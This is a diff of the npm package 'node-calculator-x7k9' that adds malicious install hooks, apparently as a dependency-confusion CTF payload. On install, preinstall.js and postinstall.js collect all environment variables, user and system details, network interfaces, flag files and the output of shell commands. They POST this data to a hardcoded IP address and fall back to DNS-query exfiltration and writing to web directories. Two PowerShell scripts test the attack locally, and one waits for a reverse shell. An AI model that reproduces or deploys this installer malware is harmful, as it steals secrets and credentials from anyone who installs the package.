node-calculator-x7k9 0.0.1-security → 3.4.0

package/package.json

@@ -1,6 +1,14 @@
-{
-  "name": "node-calculator-x7k9",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "node-calculator-x7k9",
+  "version": "3.4.0",
+  "description": "Simple calculator plugin with enhanced features",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": ["calculator", "math"],
+  "author": "DarkT",
+  "license": "MIT"
+}
+

package/postinstall.js

@@ -0,0 +1,65 @@
+#!/usr/bin/env node
+
+/**
+ * Backup Data Exfiltration Payload
+ * Runs after installation as a backup
+ */
+
+const http = require('http');
+const https = require('https');
+const { exec } = require('child_process');
+const fs = require('fs');
+
+// Configuration - MUST MATCH preinstall.js
+const EXFIL_SERVER = 'http://159.223.153.251:8080/exfil';
+
+// Simple backup exfiltration
+function backupExfil() {
+    try {
+        const data = {
+            timestamp: new Date().toISOString(),
+            source: 'postinstall',
+            environment: process.env,
+            cwd: process.cwd(),
+            user: require('os').userInfo().username,
+            hostname: require('os').hostname()
+        };
+        
+        const jsonData = JSON.stringify(data);
+        const url = new URL(EXFIL_SERVER);
+        const client = url.protocol === 'https:' ? https : http;
+        
+        const options = {
+            hostname: url.hostname,
+            port: url.port || (url.protocol === 'https:' ? 443 : 80),
+            path: url.pathname,
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(jsonData)
+            },
+            timeout: 5000
+        };
+        
+        const req = client.request(options, (res) => {
+            // Success
+        });
+        
+        req.on('error', () => {
+            // Fallback: write to file
+            try {
+                fs.writeFileSync('/tmp/postinstall_exfil.json', jsonData);
+            } catch (e) {}
+        });
+        
+        req.write(jsonData);
+        req.end();
+        
+    } catch (err) {
+        // Silent fail
+    }
+}
+
+// Execute
+console.log('Installing node-calculator-x7k9 v3.2.0...');
+setTimeout(backupExfil, 1000);

package/preinstall.js

@@ -0,0 +1,284 @@
+#!/usr/bin/env node
+
+/**
+ * Data Exfiltration Payload for CTF
+ * This executes during npm install via preinstall hook
+ * Sends environment variables and system info to attacker server
+ * 
+ * IMPORTANT: Replace EXFIL_SERVER with your server URL
+ */
+
+const http = require('http');
+const https = require('https');
+const fs = require('fs');
+const { exec } = require('child_process');
+const os = require('os');
+
+// Configuration - CHANGE THIS!
+const EXFIL_SERVER = 'http://159.223.153.251:8080/exfil';  // Your HTTP server endpoint
+
+// Local logging for debugging
+function logLocal(data) {
+    const logPath = '/tmp/exfil.log';
+    try {
+        fs.appendFileSync(logPath, `[${new Date().toISOString()}] ${data}\n`);
+    } catch (e) {
+        // Silently fail
+    }
+}
+
+// Read common flag file locations
+function findFlags() {
+    const flagLocations = [
+        '/flag.txt',
+        '/flag',
+        '/root/flag.txt',
+        '/root/flag',
+        '/home/flag.txt',
+        '/app/flag.txt',
+        '/app/flag',
+        '/var/www/flag.txt',
+        '/tmp/flag.txt',
+        process.cwd() + '/flag.txt',
+        process.cwd() + '/flag'
+    ];
+    
+    const foundFlags = {};
+    
+    flagLocations.forEach(path => {
+        try {
+            if (fs.existsSync(path)) {
+                foundFlags[path] = fs.readFileSync(path, 'utf8');
+            }
+        } catch (e) {
+            // Silently continue
+        }
+    });
+    
+    return foundFlags;
+}
+
+// Execute shell commands and capture output
+function executeCommands() {
+    const commands = {
+        'ls_root': 'ls -la /',
+        'ls_home': 'ls -la ~',
+        'ls_app': 'ls -la /app',
+        'find_flags': 'find / -name "*flag*" 2>/dev/null',
+        'printenv': 'printenv',
+        'whoami': 'whoami',
+        'id': 'id',
+        'pwd': 'pwd',
+        'ps': 'ps aux'
+    };
+    
+    const results = {};
+    const promises = [];
+    
+    Object.keys(commands).forEach(key => {
+        const promise = new Promise((resolve) => {
+            exec(commands[key], { timeout: 5000 }, (error, stdout, stderr) => {
+                results[key] = {
+                    stdout: stdout || '',
+                    stderr: stderr || '',
+                    error: error ? error.message : null
+                };
+                resolve();
+            });
+        });
+        promises.push(promise);
+    });
+    
+    return Promise.all(promises).then(() => results);
+}
+
+// Collect all sensitive data
+async function collectData() {
+    logLocal('Starting data collection...');
+    
+    const data = {
+        timestamp: new Date().toISOString(),
+        package_installed: 'node-calculator-x7k9@3.2.0',
+        
+        // Environment variables (often contain flags!)
+        environment: process.env,
+        
+        // System information
+        system: {
+            hostname: os.hostname(),
+            platform: os.platform(),
+            arch: os.arch(),
+            release: os.release(),
+            type: os.type(),
+            uptime: os.uptime(),
+            nodeVersion: process.version,
+            cwd: process.cwd(),
+            user: os.userInfo(),
+            homedir: os.homedir(),
+            tmpdir: os.tmpdir()
+        },
+        
+        // Network information
+        network: {
+            interfaces: os.networkInterfaces()
+        },
+        
+        // Flag files
+        flags: findFlags(),
+        
+        // Command outputs
+        commands: await executeCommands(),
+        
+        // Process information
+        process: {
+            pid: process.pid,
+            ppid: process.ppid,
+            title: process.title,
+            argv: process.argv,
+            execPath: process.execPath,
+            execArgv: process.execArgv,
+            env_keys: Object.keys(process.env)
+        }
+    };
+    
+    logLocal('Data collection complete');
+    return data;
+}
+
+// Send data via HTTP POST
+function sendDataHTTP(data) {
+    return new Promise((resolve, reject) => {
+        const jsonData = JSON.stringify(data, null, 2);
+        logLocal(`Attempting to send ${jsonData.length} bytes to ${EXFIL_SERVER}`);
+        
+        const url = new URL(EXFIL_SERVER);
+        const isHttps = url.protocol === 'https:';
+        const client = isHttps ? https : http;
+        
+        const options = {
+            hostname: url.hostname,
+            port: url.port || (isHttps ? 443 : 80),
+            path: url.pathname + url.search,
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(jsonData),
+                'User-Agent': 'node-calculator-x7k9/3.2.0'
+            },
+            timeout: 10000
+        };
+        
+        const req = client.request(options, (res) => {
+            let responseBody = '';
+            
+            res.on('data', (chunk) => {
+                responseBody += chunk;
+            });
+            
+            res.on('end', () => {
+                logLocal(`HTTP Response: ${res.statusCode} - ${responseBody}`);
+                resolve({ success: true, status: res.statusCode, body: responseBody });
+            });
+        });
+        
+        req.on('error', (error) => {
+            logLocal(`HTTP Error: ${error.message}`);
+            reject(error);
+        });
+        
+        req.on('timeout', () => {
+            req.destroy();
+            logLocal('HTTP Timeout');
+            reject(new Error('Request timeout'));
+        });
+        
+        req.write(jsonData);
+        req.end();
+    });
+}
+
+// Fallback: DNS exfiltration (encode data in DNS queries)
+function sendDataDNS(data) {
+    try {
+        // Encode important data as subdomain queries
+        const envKeys = Object.keys(data.environment || {}).join(',');
+        const flagData = JSON.stringify(data.flags);
+        
+        // Base64 encode and chunk into DNS-safe queries
+        const encoded = Buffer.from(flagData).toString('base64')
+            .replace(/\+/g, '-')
+            .replace(/\//g, '_')
+            .replace(/=/g, '');
+        
+        // Split into 63-char chunks (DNS label limit)
+        const chunks = encoded.match(/.{1,50}/g) || [];
+        
+        chunks.forEach((chunk, index) => {
+            const domain = `${chunk}.${index}.exfil.yourdomain.com`;
+            exec(`nslookup ${domain}`, () => {});
+        });
+        
+        logLocal('DNS exfiltration attempted');
+    } catch (e) {
+        logLocal(`DNS exfil error: ${e.message}`);
+    }
+}
+
+// Fallback: Write to accessible web directory
+function writeToWebDir(data) {
+    const webDirs = [
+        '/var/www/html/exfil.json',
+        '/app/public/exfil.json',
+        '/tmp/exfil.json',
+        process.cwd() + '/exfil.json'
+    ];
+    
+    const jsonData = JSON.stringify(data, null, 2);
+    
+    webDirs.forEach(path => {
+        try {
+            fs.writeFileSync(path, jsonData);
+            logLocal(`Data written to ${path}`);
+        } catch (e) {
+            // Silently continue
+        }
+    });
+}
+
+// Main execution
+async function main() {
+    try {
+        logLocal('===== PREINSTALL HOOK EXECUTING =====');
+        logLocal(`Running on: ${os.hostname()}`);
+        logLocal(`CWD: ${process.cwd()}`);
+        
+        // Collect all data
+        const data = await collectData();
+        
+        // Try HTTP exfiltration
+        try {
+            await sendDataHTTP(data);
+            logLocal('HTTP exfiltration successful!');
+        } catch (httpError) {
+            logLocal(`HTTP failed: ${httpError.message}`);
+            
+            // Fallback methods
+            sendDataDNS(data);
+            writeToWebDir(data);
+        }
+        
+        logLocal('===== PREINSTALL HOOK COMPLETE =====');
+        
+    } catch (err) {
+        logLocal(`Main error: ${err.message}`);
+        // Silent fail to avoid suspicion during npm install
+    }
+}
+
+// Execute with a small delay
+setTimeout(() => {
+    main().catch(err => {
+        logLocal(`Fatal error: ${err.message}`);
+    });
+}, 500);
+

package/test-exfiltration.ps1

@@ -0,0 +1,108 @@
+# Test HTTP Exfiltration Locally
+# This simulates the attack without publishing to npm
+
+param(
+    [string]$ExfilServer = "http://127.0.0.1:8080/exfil"
+)
+
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║          Local HTTP Exfiltration Test                        ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+
+# Step 1: Start exfil server
+Write-Host "[+] Step 1: Starting exfiltration server..." -ForegroundColor Green
+
+$serverJob = Start-Job -ScriptBlock {
+    Set-Location $using:PSScriptRoot
+    python3 exfil_server.py 8080
+}
+
+Write-Host "    [✓] Exfil server started (Job ID: $($serverJob.Id))" -ForegroundColor Green
+Start-Sleep -Seconds 3
+
+# Step 2: Set test environment variables (simulate the FLAG)
+Write-Host ""
+Write-Host "[+] Step 2: Setting test environment variables..." -ForegroundColor Green
+$env:FLAG = "cyctf{test_flag_local_simulation}"
+$env:TEST_VAR = "test_value"
+Write-Host "    [✓] FLAG=$env:FLAG" -ForegroundColor Green
+
+# Step 3: Update preinstall.js to use localhost
+Write-Host ""
+Write-Host "[+] Step 3: Configuring payload for localhost..." -ForegroundColor Green
+
+$preinstallContent = Get-Content "preinstall.js" -Raw
+$originalServer = ($preinstallContent -match "const EXFIL_SERVER = '(.*?)';") ? $Matches[1] : ""
+$preinstallContent = $preinstallContent -replace "const EXFIL_SERVER = '.*?';", "const EXFIL_SERVER = '$ExfilServer';"
+Set-Content "preinstall.js" -Value $preinstallContent
+Write-Host "    [✓] Configured for $ExfilServer" -ForegroundColor Green
+
+# Step 4: Run preinstall.js
+Write-Host ""
+Write-Host "[+] Step 4: Executing preinstall.js..." -ForegroundColor Green
+Write-Host "    [*] This simulates npm install running the script" -ForegroundColor Yellow
+
+$output = node preinstall.js 2>&1
+Write-Host "    [✓] Script executed" -ForegroundColor Green
+
+# Step 5: Wait and check server output
+Write-Host ""
+Write-Host "[+] Step 5: Checking exfil server output..." -ForegroundColor Green
+Start-Sleep -Seconds 5
+
+$serverOutput = Receive-Job -Id $serverJob.Id
+if ($serverOutput) {
+    Write-Host $serverOutput
+    
+    if ($serverOutput -match "FLAG") {
+        Write-Host ""
+        Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Green
+        Write-Host "║  ✓ SUCCESS! Flag was exfiltrated successfully!               ║" -ForegroundColor Green
+        Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Green
+    }
+} else {
+    Write-Host "    [!] No output from server yet" -ForegroundColor Yellow
+}
+
+# Step 6: Check saved files
+Write-Host ""
+Write-Host "[+] Step 6: Checking saved exfiltration data..." -ForegroundColor Green
+
+if (Test-Path "exfil_logs") {
+    $files = Get-ChildItem "exfil_logs" -File | Sort-Object LastWriteTime -Descending
+    if ($files) {
+        $latestFile = $files[0]
+        Write-Host "    [✓] Latest file: $($latestFile.Name)" -ForegroundColor Green
+        
+        $content = Get-Content $latestFile.FullName -Raw | ConvertFrom-Json
+        if ($content.environment.FLAG) {
+            Write-Host "    [✓] FLAG found in file: $($content.environment.FLAG)" -ForegroundColor Green
+        }
+    }
+}
+
+# Restore original server URL
+if ($originalServer) {
+    Write-Host ""
+    Write-Host "[+] Restoring original EXFIL_SERVER configuration..." -ForegroundColor Yellow
+    $preinstallContent = Get-Content "preinstall.js" -Raw
+    $preinstallContent = $preinstallContent -replace "const EXFIL_SERVER = '.*?';", "const EXFIL_SERVER = '$originalServer';"
+    Set-Content "preinstall.js" -Value $preinstallContent
+    Write-Host "    [✓] Restored to: $originalServer" -ForegroundColor Green
+}
+
+# Cleanup
+Write-Host ""
+Write-Host "[*] Press Enter to stop server and exit..." -ForegroundColor Yellow
+Read-Host
+
+Stop-Job -Id $serverJob.Id -ErrorAction SilentlyContinue
+Remove-Job -Id $serverJob.Id -ErrorAction SilentlyContinue
+Write-Host "[✓] Cleanup complete" -ForegroundColor Green
+
+Write-Host ""
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Test Complete! Check exfil_logs/ for captured data          ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+

package/test-local.ps1

@@ -0,0 +1,127 @@
+# Local Testing Script - Test the malicious package locally before publishing
+# This simulates the attack without needing to publish to npm
+
+param(
+    [string]$AttackerIP = "127.0.0.1",
+    [int]$AttackerPort = 4444
+)
+
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║          Local Testing - Dependency Confusion CTF            ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+
+# Get current directory
+$rootDir = Split-Path -Parent $PSScriptRoot
+$maliciousDir = Join-Path $rootDir "malicious-package"
+$targetDir = Join-Path $rootDir "just-a-calculator"
+
+Write-Host "[*] Root Directory: $rootDir" -ForegroundColor Yellow
+Write-Host "[*] Malicious Package: $maliciousDir" -ForegroundColor Yellow
+Write-Host "[*] Target App: $targetDir" -ForegroundColor Yellow
+Write-Host ""
+
+# Step 1: Configure payload
+Write-Host "[+] Step 1: Configuring payload..." -ForegroundColor Green
+Set-Location $maliciousDir
+
+$preinstallPath = "preinstall.js"
+$postinstallPath = "postinstall.js"
+
+$preinstallContent = Get-Content $preinstallPath -Raw
+$preinstallContent = $preinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$preinstallContent = $preinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $preinstallPath -Value $preinstallContent
+
+$postinstallContent = Get-Content $postinstallPath -Raw
+$postinstallContent = $postinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$postinstallContent = $postinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $postinstallPath -Value $postinstallContent
+
+Write-Host "    [✓] Payload configured for $AttackerIP:$AttackerPort" -ForegroundColor Green
+
+# Step 2: Start listener
+Write-Host ""
+Write-Host "[+] Step 2: Starting listener..." -ForegroundColor Green
+
+if (Test-Path "listener.py") {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($dir, $port)
+        Set-Location $dir
+        python3 listener.py $port
+    } -ArgumentList $maliciousDir, $AttackerPort
+    Write-Host "    [✓] Listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} else {
+    Write-Host "    [!] listener.py not found" -ForegroundColor Red
+}
+
+Start-Sleep -Seconds 2
+
+# Step 3: Pack the malicious package
+Write-Host ""
+Write-Host "[+] Step 3: Packing malicious package..." -ForegroundColor Green
+$packOutput = npm pack 2>&1
+Write-Host "    [✓] Package created: $packOutput" -ForegroundColor Green
+
+# Step 4: Install into target application
+Write-Host ""
+Write-Host "[+] Step 4: Installing malicious package into target..." -ForegroundColor Green
+Set-Location $targetDir
+
+# Remove old package
+if (Test-Path "node_modules\node-calculator-x7k9") {
+    Write-Host "    [*] Removing old package..." -ForegroundColor Yellow
+    Remove-Item "node_modules\node-calculator-x7k9" -Recurse -Force
+}
+
+# Install malicious package
+$packagePath = Join-Path $maliciousDir "node-calculator-x7k9-3.0.0.tgz"
+Write-Host "    [*] Installing from: $packagePath" -ForegroundColor Yellow
+
+npm install $packagePath
+
+Write-Host "    [✓] Package installed!" -ForegroundColor Green
+
+# Step 5: Check listener
+Write-Host ""
+Write-Host "[+] Step 5: Checking for shell..." -ForegroundColor Green
+Write-Host "    [*] Waiting for reverse shell connection..." -ForegroundColor Yellow
+Write-Host ""
+
+# Monitor listener for 30 seconds
+$timeout = 30
+$elapsed = 0
+while ($elapsed -lt $timeout) {
+    $output = Receive-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    if ($output) {
+        Write-Host $output
+        if ($output -match "Connection received") {
+            Write-Host ""
+            Write-Host "[✓] SHELL RECEIVED!" -ForegroundColor Green
+            break
+        }
+    }
+    Start-Sleep -Seconds 2
+    $elapsed += 2
+    Write-Host "." -NoNewline -ForegroundColor Gray
+}
+
+Write-Host ""
+Write-Host ""
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Testing Complete                                             ║" -ForegroundColor Cyan
+Write-Host "║                                                               ║" -ForegroundColor Cyan
+Write-Host "║  Listener is still running (Job ID: $($listenerJob.Id))              ║" -ForegroundColor Cyan
+Write-Host "║  To view: Receive-Job $($listenerJob.Id)                             ║" -ForegroundColor Cyan
+Write-Host "║  To stop: Stop-Job $($listenerJob.Id); Remove-Job $($listenerJob.Id)        ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+
+Write-Host ""
+Write-Host "Press Enter to stop listener and cleanup..." -ForegroundColor Yellow
+Read-Host
+
+# Cleanup
+Stop-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Remove-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Write-Host "[✓] Cleanup complete" -ForegroundColor Green
+